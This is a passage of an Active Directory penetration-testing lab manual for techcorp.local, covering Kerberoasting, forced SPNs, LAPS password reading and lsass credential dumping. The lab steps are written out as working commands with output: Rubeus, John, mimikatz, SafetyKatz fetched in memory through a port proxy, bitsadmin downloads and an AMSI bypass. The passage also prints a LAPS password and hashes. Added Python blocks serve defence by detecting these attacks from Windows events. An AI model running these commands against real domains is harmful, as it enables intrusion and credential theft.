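def is_privileged_group(target_sid, target_name):
    """Match on the well-known RID first, then on the watched-group name."""
    rid = target_sid.rsplit("-", 1)[-1]
    return rid in PRIVILEGED_RIDS or target_name.lower() in WATCHED_GROUPS


def review_group_changes(events):
    """Alerts for member-added events that touch a privileged group."""
    alerts = []
    for ev in events:
        if ev["EventID"] not in MEMBER_ADDED:
            continue
        if not is_privileged_group(ev["TargetSid"], ev["TargetUserName"]):
            continue
        reasons = [f"member added to privileged {MEMBER_ADDED[ev['EventID']]} "
                   f"{ev['TargetDomainName']}\\{ev['TargetUserName']}"]
        if ev["SubjectUserName"].endswith("$"):
            # Assumption: SYSTEM shows up as the computer account; interactive admins do not.
            reasons.append("change made by SYSTEM (computer account), not by an admin session")
        alerts.append({
            "host": ev["Computer"],
            # 4732 on a member host often carries only the SID of a domain member
            "member": ev["MemberSid"] if ev["MemberName"] == "-" else ev["MemberName"],
            "subject": ev["SubjectUserName"],
            "reasons": reasons,
        })
    return alerts


# Constructed sample records (fields as in the Security log's EventData).
SAMPLE_EVENTS = [
    {"EventID": 4732, "Computer": "studentx.us.techcorp.local",
     "SubjectUserName": "STUDENTX$", "SubjectDomainName": "US",
     "TargetUserName": "Administrators", "TargetDomainName": "Builtin",
     "TargetSid": "S-1-5-32-544", "MemberName": "-", "MemberSid": "S-1-5-21-0-0-0-1120"},
    {"EventID": 4728, "Computer": "us-dc.us.techcorp.local",
     "SubjectUserName": "studentuserx", "SubjectDomainName": "US",
     "TargetUserName": "MachineAdmins", "TargetDomainName": "US",
     "TargetSid": "S-1-5-21-0-0-0-1118",
     "MemberName": "CN=studentuserx,CN=Users,DC=us,DC=techcorp,DC=local",
     "MemberSid": "S-1-5-21-0-0-0-1120"},
    {"EventID": 4728, "Computer": "us-dc.us.techcorp.local",
     "SubjectUserName": "hr-admin", "SubjectDomainName": "US",
     "TargetUserName": "HelpdeskUsers", "TargetDomainName": "US",
     "TargetSid": "S-1-5-21-0-0-0-2200",
     "MemberName": "CN=newhire,CN=Users,DC=us,DC=techcorp,DC=local",
     "MemberSid": "S-1-5-21-0-0-0-2300"},
]

if __name__ == "__main__":
    for alert in review_group_changes(SAMPLE_EVENTS):
        print(alert["host"], alert["member"], "by", alert["subject"])
        for reason in alert["reasons"]:
            print("   !", reason)
```

The watch list is the part that needs local knowledge: the RID match catches the built-in groups everywhere, but a group such as MachineAdmins only matters because its GenericAll edge from Managers makes it a path to the Mgmt OU, which is exactly what the BloodHound query above surfaces. Feeding the groups found that way into WATCHED_GROUPS closes the loop between the enumeration and the detection.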

Hands-On 6:
Task
• Using the Kerberoast attack, get the clear-text password for an account in us.techcorp.local
domain.

Solution
We first need to find services running with user accounts, as services running with machine accounts
have long, random passwords. We can use PowerView's (Get-DomainUser -SPN) or the ActiveDirectory
module for discovering such services. Using the ActiveDirectory module:

PS C:\AD\Tools> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName


DistinguishedName : CN=krbtgt,CN=Users,DC=us,DC=techcorp,DC=local
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 6dce7bd9-287f-4ab3-b5ba-0bb1e8aab391
SamAccountName : krbtgt
ServicePrincipalName : {kadmin/changepw}
SID : S-1-5-21-210670787-2521448726-163245708-502
Surname :
UserPrincipalName :

DistinguishedName : CN=serviceaccount,CN=Users,DC=us,DC=techcorp,DC=local
Enabled : True
GivenName : service
Name : serviceaccount
ObjectClass : user
ObjectGUID : 8a97f972-51b1-4647-8b73-628f5da8ca01
SamAccountName : serviceaccount
ServicePrincipalName : {USSvc/serviceaccount}
SID : S-1-5-21-210670787-2521448726-163245708-1144
Surname : account
UserPrincipalName : serviceaccount
[snip]

Please note that it is not necessary to have an actual service using 'serviceaccount'. For the DC, an
account with SPN set is a service account.

Rubeus and John the Ripper
We can use Rubeus to get hashes for the serviceaccount. Note that we are using the /rc4opsec option,
which gets hashes only for the accounts that support RC4. This means that if 'This account supports
Kerberos AES 128/256 bit encryption' is set for a service account, the command below will not request
its hashes.

C:\AD\Tools>C:\AD\Tools\Rubeus.exe kerberoast /user:serviceaccount /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user


[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will
be requested for everything else
[*] Target User : serviceaccount
[+] Ticket successfully imported!
[*] Searching path 'LDAP://US.TECHCORP.LOCAL/DC=US,DC=TECHCORP,DC=LOCAL' for
Kerberoastable users
[*] Searching for accounts that only support RC4_HMAC, no AES

[*] Total kerberoastable users : 1

[*] Hash written to C:\AD\Tools\hashes.txt

[*] Roasted hashes written to : C:\AD\Tools\hashes.txt

We can now use John the Ripper to brute-force the hashes.

C:\AD\Tools> C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123 (?)
1g 0:00:00:00 DONE (2021-01-10 02:12) 76.92g/s 59076p/s 59076c/s 59076C/s
password..9999
Use the "--show" option to display all of the cracked passwords reliably
Session completed

KerberosRequestorSecurityToken .NET class from PowerShell, Mimikatz and tgsrepcrack.py
We can also use the KerberosRequestorSecurityToken .NET class from PowerShell to request a ticket.
Let's request a ticket for the serviceaccount user:

PS C:\AD\Tools> Add-Type -AssemblyName System.IdentityModel
PS C:\AD\Tools> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "USSvc/serviceaccount"

Id : uuid-205a6721-7110-4433-8a47-6687a2ba2f31-1
SecurityKeys :
{System.IdentityModel.Tokens.InMemorySymmetricSecurityKey}
ValidFrom : 1/10/2021 1:04:23 PM
ValidTo : 1/10/2021 7:45:57 PM
ServicePrincipalName : USSvc/serviceaccount
SecurityKey :
System.IdentityModel.Tokens.InMemorySymmetricSecurityKey

Let's check if we got the ticket:

PS C:\AD\Tools> klist

#2> Client: studentuserx @ US.TECHCORP.LOCAL
Server: USSvc/serviceaccount @ US.TECHCORP.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x60210000 -> forwardable forwarded pre_authent
name_canonicalize
Start Time: 1/10/2021 5:04:23 (local)
End Time: 1/10/2021 11:45:57 (local)
Renew Time: 0
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called: US-DC.us.techcorp.local
[snip]

Now, let’s dump the tickets on disk:

PS C:\AD\Tools> . C:\AD\Tools\Invoke-Mimi.ps1
PS C:\AD\Tools> Invoke-Mimi -Command '"kerberos::list /export"'

.#####. mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::list /export

[snip]

[00000002] - 0x00000017 - rc4_hmac_nt
Start/End/MaxRenew: 1/10/2021 5:04:23 AM ; 1/10/2021 11:45:57 AM ;
Server Name : USSvc/serviceaccount @ US.TECHCORP.LOCAL
Client Name : studentuserx @ US.TECHCORP.LOCAL
Flags 60210000 : name_canonicalize ; pre_authent ; forwarded ;
forwardable ;
* Saved to file : 2-60210000-studentuserx@USSvc~serviceaccount-
US.TECHCORP.LOCAL.kirbi
[snip]

Let's brute-force the ticket now:

PS C:\AD\Tools> Copy-Item C:\AD\Tools\2-60210000-studentuserx@USSvc~serviceaccount-US.TECHCORP.LOCAL.kirbi C:\AD\Tools\kerberoast\
PS C:\AD\Tools> cd C:\AD\Tools\kerberoast\
PS C:\AD\Tools\kerberoast> python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\2-60210000-studentuserx@USSvc~serviceaccount-US.TECHCORP.LOCAL.kirbi
found password for ticket 0: Password123 File: .\2-60210000-studentuserx@USSvc~serviceaccount-US.TECHCORP.LOCAL.kirbi
All tickets cracked!

Hands-On 7:
Task
• Determine if studentuserx has permissions to set UserAccountControl flags for any user.
• If yes, force set a SPN on the user and obtain a TGS for the user.

Solution
Let's check if studentuserx has permissions to set User Account Control settings for any user. Recall from
a previous hands-on that we also scan ACLs to see if any group of which studentuserx is a member has
interesting permissions. Run the PowerView command below from InvisiShell:

PS C:\AD\Tools> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "StudentUsers"}

ObjectDN : CN=Support23User,CN=Users,DC=us,DC=techcorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1116
IdentityReferenceName : studentusers
IdentityReferenceDomain : us.techcorp.local
IdentityReferenceDN : CN=StudentUsers,CN=Users,DC=us,DC=techcorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support24User,CN=Users,DC=us,DC=techcorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1116
IdentityReferenceName : studentusers
IdentityReferenceDomain : us.techcorp.local
IdentityReferenceDN : CN=StudentUsers,CN=Users,DC=us,DC=techcorp,DC=local
IdentityReferenceClass : group
[snip]

Let's check if supportXuser already has an SPN. We can do it with PowerView or the ActiveDirectory module.
Use the command below from the ActiveDirectory module:

PS C:\AD\Tools> Get-ADUser -Identity supportXuser -Properties ServicePrincipalName | select ServicePrincipalName

ServicePrincipalName
--------------------
{}

Since studentuserX has GenericAll rights on supportXuser, let's force set an SPN on it. Using the
ActiveDirectory module:

PS C:\AD\Tools> Set-ADUser -Identity supportXuser -ServicePrincipalNames @{Add='us/myspnX'} -Verbose
VERBOSE: Performing the operation "Set" on target
"CN=SupportXUser,CN=Users,DC=us,DC=techcorp,DC=local".

Or, using PowerView:

PS C:\AD\Tools> Set-DomainObject -Identity supportXuser -Set @{serviceprincipalname='us/myspnX'} -Verbose
[snip]

Now, once again check the SPN for supportXuser:

PS C:\AD\Tools> Get-ADUser -Identity supportXuser -Properties ServicePrincipalName | select ServicePrincipalName

ServicePrincipalName
--------------------
us/myspnX

Now, we can Kerberoast the SPN:

C:\AD\Tools>C:\AD\Tools\Rubeus.exe kerberoast /user:supportXuser /simple /rc4opsec /outfile:C:\AD\Tools\targetedhashes.txt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user


[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will
be requested for everything else
[*] Target User : supportXuser
[+] Ticket successfully imported!
[*] Searching path 'LDAP://US.TECHCORP.LOCAL/DC=US,DC=TECHCORP,DC=LOCAL' for
Kerberoastable users
[*] Searching for accounts that only support RC4_HMAC, no AES

[*] Total kerberoastable users : 1

[*] Hash written to C:\AD\Tools\targetedhashes.txt

[*] Roasted hashes written to : C:\AD\Tools\targetedhashes.txt

Let's brute-force the ticket now:

C:\AD\Tools>C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Desk@123 (?)
1g 0:00:00:00 DONE (2021-01-10 05:27) 66.66g/s 51200p/s 51200c/s 51200C/s
password..9999
Use the "--show" option to display all of the cracked passwords reliably
Session completed
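
Hands-On 6 and Hands-On 7 each leave a distinct trace on the domain controller, and both can be checked with the same event-record processing. The Rubeus /rc4opsec request in both hands-on asks the KDC for an RC4 (etype 0x17) service ticket, which is logged as Security event 4769 with TicketEncryptionType 0x17 for an SPN that belongs to a user account; the forced SPN in Hands-On 7 is a write to servicePrincipalName on another user's object, which is logged as event 5136 when Directory Service Changes auditing and a SACL on user objects are in place. The following block is an added example, not code from the lab manual, Rubeus or John: it implements both detections over constructed sample records. The requester IPs, the svc-provisioning allow-list entry and the event records are constructed.

```python
"""Two Kerberoasting indicators, for Hands-On 6 (roasting an existing SPN) and
Hands-On 7 (targeted Kerberoasting after forcing an SPN onto a user).

Added example, not from the lab manual. Detection 1 reads Security event 4769
(Kerberos service ticket requested): an RC4 (etype 0x17) ticket for an SPN held by a
user account, which is what Rubeus /rc4opsec asks the KDC for. Detection 2 reads
event 5136 (directory object modified; needs 'Audit Directory Service Changes' and
a SACL on user objects): a servicePrincipalName value added to an account by a
principal other than that account or a known SPN-management identity. The event
records, the requester IPs and the SPN_WRITERS allow-list are constructed samples.
"""
from collections import Counter

RC4_HMAC = "0x17"
# SPN holders whose RC4 tickets are not Kerberoast targets.
IGNORED_SERVICES = {"krbtgt"}
# Identities allowed to set SPNs on other accounts (sample value).
SPN_WRITERS = {"svc-provisioning"}
VALUE_ADDED = {"%%14674", "Value Added"}  # 5136 OperationType for an added value


def is_user_spn(service_name):
    """True when the 4769 ServiceName is a user account (not computer$, not krbtgt)."""
    name = service_name.split("@")[0]
    return not name.endswith("$") and name.lower() not in IGNORED_SERVICES


def rc4_user_tgs(events):
    """Successful RC4 service-ticket requests for user SPNs, counted per (requester, IP)."""
    hits = [
        ev for ev in events
        if ev["EventID"] == 4769
        and ev["TicketEncryptionType"].lower() == RC4_HMAC
        and ev["Status"] == "0x0"
        and is_user_spn(ev["ServiceName"])
    ]
    return Counter((ev["TargetUserName"], ev["IpAddress"]) for ev in hits), hits


def spn_added_by_other(events):
    """5136 records where someone else added a servicePrincipalName to an account."""
    out = []
    for ev in events:
        if ev["EventID"] != 5136:
            continue
        if ev["AttributeLDAPDisplayName"].lower() != "serviceprincipalname":
            continue
        if ev["OperationType"] not in VALUE_ADDED:
            continue
        subject = ev["SubjectUserName"].lower()
        object_cn = ev["ObjectDN"].split(",")[0].split("=", 1)[1].lower()
        if subject == object_cn or subject in SPN_WRITERS:
            continue
        out.append((subject, ev["ObjectDN"], ev["AttributeValue"]))
    return out


REQUESTER = "studentuserx@US.TECHCORP.LOCAL"
STUDENT_IP = "::ffff:192.168.100.41"  # constructed
# Constructed samples: the two roasts above, a normal AES ticket to a computer
# account, a TGT renewal, the forced SPN, and a legitimate SPN registration.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": REQUESTER, "ServiceName": "serviceaccount",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": STUDENT_IP},
    {"EventID": 4769, "TargetUserName": REQUESTER, "ServiceName": "supportXuser",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": STUDENT_IP},
    {"EventID": 4769, "TargetUserName": REQUESTER, "ServiceName": "US-MAILMGMT$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": STUDENT_IP},
    {"EventID": 4769, "TargetUserName": "alice@US.TECHCORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.168.100.7"},
    {"EventID": 5136, "SubjectUserName": "studentuserx",
     "ObjectDN": "CN=supportXuser,CN=Users,DC=us,DC=techcorp,DC=local",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "us/myspnX",
     "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "svc-provisioning",
     "ObjectDN": "CN=websvc,CN=Users,DC=us,DC=techcorp,DC=local",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "HTTP/web01",
     "OperationType": "%%14674"},
]

if __name__ == "__main__":
    counts, _ = rc4_user_tgs(SAMPLE_EVENTS)
    for (who, ip), n in counts.items():
        print(f"[4769] {who} from {ip}: {n} RC4 user-SPN ticket(s)")
    for subject, dn, spn in spn_added_by_other(SAMPLE_EVENTS):
        print(f"[5136] {subject} added SPN {spn} to {dn}")
```

The 4769 rule is noisy on its own in domains where RC4 is still common, which is why it counts per requester and IP: one user pulling RC4 tickets for several user SPNs in a short window is the pattern, not a single ticket. The mitigation matches the /rc4opsec note above: service accounts limited to AES (msDS-SupportedEncryptionTypes without the RC4 bit) are skipped by that option and produce etype 0x12 tickets, and gMSAs remove the crackable password altogether.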

Hands-On 8:
Task
• Identify OUs where LAPS is in use and user(s) who have permission to read passwords.
• Abuse the permissions to get the clear text password(s).

Solution
First, we need to find the OUs where LAPS is in use. We can enumerate this using the ActiveDirectory
module and the LAPS module. Let's use the Get-LapsPermissions.ps1 PowerShell script for that. Remember that
we continue to use InvisiShell to run PowerShell tools:

PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
PS C:\AD\Tools> Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1 -Verbose
VERBOSE: Loading module from path 'C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1'.
VERBOSE: Importing cmdlet 'Find-AdmPwdExtendedRights'.
VERBOSE: Importing cmdlet 'Get-AdmPwdPassword'.
VERBOSE: Importing cmdlet 'Reset-AdmPwdPassword'.
VERBOSE: Importing cmdlet 'Set-AdmPwdAuditing'.
VERBOSE: Importing cmdlet 'Set-AdmPwdComputerSelfPermission'.
VERBOSE: Importing cmdlet 'Set-AdmPwdReadPasswordPermission'.
VERBOSE: Importing cmdlet 'Set-AdmPwdResetPasswordPermission'.
VERBOSE: Importing cmdlet 'Update-AdmPwdADSchema'.

PS C:\AD\Tools> C:\AD\Tools\Get-LapsPermissions.ps1

Read Rights

organizationalUnit IdentityReference
------------------ -----------------
OU=MailMgmt,DC=us,DC=techcorp,DC=local US\studentusers

Write Rights

OU=MailMgmt,DC=us,DC=techcorp,DC=local NT AUTHORITY\SELF

We can also use PowerView for this enumeration:

PS C:\AD\Tools> Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

AceQualifier : AccessAllowed
ObjectDN : OU=MailMgmt,DC=us,DC=techcorp,DC=local
ActiveDirectoryRights : ReadProperty, ExtendedRight
ObjectAceType : ms-Mcs-AdmPwd
ObjectSID :
InheritanceFlags : ContainerInherit
BinaryLength : 72
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1116
AccessMask : 272
AuditFlags : None
IsInherited : False
AceFlags : ContainerInherit, InheritOnly
InheritedObjectAceType : Computer
OpaqueLength : 0
IdentityName : US\studentusers

So, the studentusers group can read the password of the LAPS-managed Administrator on the us-mailmgmt
machine. Let's try it using the ActiveDirectory module, the LAPS module and PowerView. Note that the
password could be different in your lab:

Using ActiveDirectory module:

PS C:\AD\Tools> Get-ADComputer -Identity us-mailmgmt -Properties ms-mcs-admpwd | select -ExpandProperty ms-mcs-admpwd
t7HoBF+m]ctv.]

Using LAPS module:

PS C:\AD\Tools> Get-AdmPwdPassword -ComputerName us-mailmgmt

ComputerName DistinguishedName                             Password       ExpirationTimestamp
------------ -----------------                             --------       -------------------
US-MAILMGMT  CN=US-MAILMGMT,OU=MailMgmt,DC=us,DC=techco... t7HoBF+m]ctv.] 2/6/2021 10:47:23 PM

Using PowerView:

PS C:\AD\Tools> Get-DomainObject -Identity us-mailmgmt | select -ExpandProperty ms-mcs-admpwd

t7HoBF+m]ctv.]

Let's try to access the us-mailmgmt machine with this password using winrs. Success means
administrative access:

C:\AD\Tools>winrs -r:us-mailmgmt -u:.\administrator -p:t7HoBF+m]ctv.] cmd

Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Administrator>hostname
hostname
US-MailMgmt

C:\Users\Administrator>whoami
whoami
us-mailmgmt\administrator

We can also use a PSRemoting session:

PS C:\AD\Tools> $passwd = ConvertTo-SecureString 't7HoBF+m]ctv.]' -AsPlainText -Force
PS C:\AD\Tools> $creds = New-Object System.Management.Automation.PSCredential ("us-mailmgmt\administrator", $passwd)
PS C:\AD\Tools> $mailmgmt = New-PSSession -ComputerName us-mailmgmt -Credential $creds
PS C:\AD\Tools> $mailmgmt

 Id Name   ComputerName ComputerType  State  ConfigurationName    Availability
 -- ----   ------------ ------------  -----  -----------------    ------------
  1 WinRM1 us-mailmgmt  RemoteMachine Opened Microsoft.PowerShell    Available
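
The LAPS module imported above includes Set-AdmPwdAuditing, which makes every read of ms-Mcs-AdmPwd produce Security event 4662 on the domain controller, so the read performed in this hands-on is auditable even though the permission itself was granted by design. The following review logic is an added example, not code from the lab manual or from the LAPS module: it selects 4662 records whose Properties field names the ms-Mcs-AdmPwd attribute and whose access mask includes read-property, then raises an alert for any reader outside an allow-list and for an expected reader that touches many computers at once. The attribute's schemaIDGUID is forest-specific, so ADMPWD_GUID is a placeholder to be replaced with the value from your schema; the records, the reader allow-list and the bulk threshold are constructed.

```python
"""Review who reads LAPS passwords, from Security event 4662 records.

Added example, not from the lab manual. Legacy LAPS can audit reads of ms-Mcs-AdmPwd
(Set-AdmPwdAuditing, one of the cmdlets imported above); each read then produces a
4662 ('An operation was performed on an object') on the domain controller, with the
schemaIDGUID of ms-Mcs-AdmPwd in the Properties field and read-property (0x10) in
AccessMask. That GUID differs per forest, so ADMPWD_GUID below is a placeholder to be
replaced with the value from your schema; the records, the reader allow-list and the
bulk threshold are constructed sample values.
"""
from collections import defaultdict

ADMPWD_GUID = "00000000-0000-0000-0000-000000000001"  # PLACEHOLDER: schemaIDGUID of ms-Mcs-AdmPwd
OTHER_ATTR_GUID = "11111111-1111-1111-1111-111111111111"  # PLACEHOLDER: some unrelated attribute
COMPUTER_CLASS_GUID = "bf967a86-0de6-11d0-a285-00aa003049e2"  # computer object class
EXPECTED_READERS = {"helpdesk-t1", "laps-reader-svc"}  # sample allow-list
READ_PROPERTY = 0x10


def laps_reads(events, admpwd_guid=ADMPWD_GUID):
    """(reader, computer DN) for every 4662 that read ms-Mcs-AdmPwd."""
    reads = []
    for ev in events:
        if ev["EventID"] != 4662:
            continue
        if admpwd_guid.lower() not in ev["Properties"].lower():
            continue
        if not int(ev["AccessMask"], 16) & READ_PROPERTY:
            continue
        reads.append((ev["SubjectUserName"].lower(), ev["ObjectName"]))
    return reads


def review_laps_reads(events, expected=EXPECTED_READERS, bulk_threshold=5):
    """Alerts for unexpected readers and for expected readers touching many hosts."""
    per_reader = defaultdict(set)
    for reader, obj in laps_reads(events):
        per_reader[reader].add(obj)
    alerts = []
    for reader, objects in per_reader.items():
        if reader not in expected:
            alerts.append(f"{reader}: unexpected reader, LAPS password read for "
                          f"{len(objects)} computer(s)")
        elif len(objects) > bulk_threshold:
            alerts.append(f"{reader}: read LAPS passwords of {len(objects)} computers, "
                          "possible bulk harvesting")
    return alerts, dict(per_reader)


def _event(reader, computer_dn, prop_guid):
    """Constructed 4662 record with the fields the checks above use."""
    return {"EventID": 4662, "SubjectUserName": reader, "ObjectName": computer_dn,
            "ObjectType": COMPUTER_CLASS_GUID, "AccessMask": "0x10",
            "Properties": f"{{{COMPUTER_CLASS_GUID}}} {{{prop_guid}}}"}


MAILMGMT_DN = "CN=US-MAILMGMT,OU=MailMgmt,DC=us,DC=techcorp,DC=local"
# Constructed samples: the lab read above, a normal helpdesk read, an unrelated
# attribute read, and a service account sweeping six workstations.
SAMPLE_EVENTS = [
    _event("studentuserx", MAILMGMT_DN, ADMPWD_GUID),
    _event("helpdesk-t1", MAILMGMT_DN, ADMPWD_GUID),
    _event("studentuserx", MAILMGMT_DN, OTHER_ATTR_GUID),
] + [
    _event("laps-reader-svc", f"CN=WS{i:02d},OU=Workstations,DC=us,DC=techcorp,DC=local", ADMPWD_GUID)
    for i in range(6)
]

if __name__ == "__main__":
    alerts, per_reader = review_laps_reads(SAMPLE_EVENTS)
    for reader, objects in per_reader.items():
        print(f"{reader}: {len(objects)} computer(s)")
    for alert in alerts:
        print(" !", alert)
```

The finding in this hands-on is really the first check: a broad group such as studentusers should not be in the expected-reader set at all, and Find-AdmPwdExtendedRights (also imported above) is the quickest way to produce that set for comparison. The bulk check covers the other failure mode, an allowed account whose credentials are used to sweep every computer in an OU.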

Hands-On 9:
Task
• Use Invoke-Mimi to extract credentials of interactive logon sessions and service accounts from
us-mailmgmt.

Solution
We can use either winrs with open-source binaries, or PowerShell Remoting with Invoke-Mimi.ps1. Let us
try them one by one.

winrs and open-source binaries

Use the credentials for administrator from the previous hands-on to access us-mailmgmt. Remember that
the password could be different in your lab instance:

C:\AD\Tools>net use x: \\us-mailmgmt\C$\Users\Public /user:us-mailmgmt\Administrator t7HoBF+m]ctv.]
The command completed successfully.
C:\AD\Tools>echo F | xcopy C:\AD\Tools\Loader.exe x:\Loader.exe
Does X:\Loader.exe specify a file name
or directory name on the target
(F = file, D = directory)? F
C:\AD\Tools\Loader.exe
1 File(s) copied
C:\AD\Tools>net use x: /d
x: was deleted successfully.

Next, we can download and run SafetyKatz in memory using Loader. To bypass behaviour detection of
SafetyKatz we need to perform an additional step: forward traffic from the local (target) machine to the
student machine, so that the download always happens from 127.0.0.1.

Run the following commands to connect to us-mailmgmt using winrs and forward the traffic. Remember
to modify the IP address in connectaddress in the netsh command to your student VM:

C:\AD\Tools>winrs -r:us-mailmgmt -u:.\administrator -p:t7HoBF+m]ctv.] cmd

Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Administrator>netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=192.168.100.X

Now, we will use the Loader.exe to run SafetyKatz.exe from memory to extract credentials from the lsass
process. Remember to host SafetyKatz.exe on a local web server on your Student VM.

C:\Users\Administrator>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
[!] ~Flangvik , ~Arno0x #NetLoader
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : http://127.0.0.1:8080/SafetyKatz.exe
[+] Arguments :

[*] Dumping lsass (708) to C:\Windows\Temp\test.txt


[+] Dump successful!

[*] Executing loaded Mimikatz PE

.#####. mimikatz 2.2.0 (x64) #19041 Dec 18 2020 22:37:12


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -path
ERROR mimikatz_doLocal ; "-path" command of "standard" module not found !
[snip]

In the Mimikatz prompt that opens up we can use the following command:

mimikatz # sekurlsa::keys

[snip]

Authentication Id : 0 ; 44772476 (00000000:02ab2c7c)
Session : Service from 0
User Name : provisioningsvc
Domain : US
Logon Server : US-DC
Logon Time : 11/5/2021 4:52:05 AM
SID : S-1-5-21-210670787-2521448726-163245708-8602

         * Username : provisioningsvc
         * Domain   : US.TECHCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       a573a68973bfe9cbfb8037347397d6ad1aae87673c4f5b4979b57c0b745aee2a
           rc4_hmac_nt       44dea6608c25a85d578d0c2b6f8355c4
           rc4_hmac_old      44dea6608c25a85d578d0c2b6f8355c4
           rc4_md4           44dea6608c25a85d578d0c2b6f8355c4
[snip]

Alternatively, we could also use bitsadmin, a Microsoft-signed binary, to download NetLoader on
us-mailmgmt. Remember to host Loader.exe on a local web server on your student VM.

C:\AD\Tools>winrs -r:us-mailmgmt -u:.\administrator -p:t7HoBF+m]ctv.]
"bitsadmin /transfer WindowsUpdates /priority normal
http://127.0.0.1:8080/Loader.exe C:\\Users\\Public\\Loader.exe"

If you get an error like 'Unable to add file - 0x800704dd The operation being requested was not
performed because the user has not logged on to the network. The specified service does not
exist.', then you may like to use xcopy to copy the loader instead.

PowerShell Remoting and Invoke-Mimi


We will use Invoke-Mimi on us-mailmgmt to extract credentials.

PS C:\AD\Tools> $passwd = ConvertTo-SecureString 't7HoBF+m]ctv.]' -AsPlainText -Force
PS C:\AD\Tools> $creds = New-Object System.Management.Automation.PSCredential
("us-mailmgmt\administrator", $passwd)
PS C:\AD\Tools> $mailmgmt = New-PSSession -ComputerName us-mailmgmt -Credential $creds

We need to disable AMSI for the PSSession so that we can use the stock Invoke-Mimi.ps1 script. To
avoid disabling AMSI, you can use a modified Invoke-Mimi instead:

PS C:\AD\Tools> Enter-PSSession $mailmgmt


[us-mailmgmt]: PS C:\Users\Administrator\Documents> S`eT-It`em ( 'V'+'aR' +
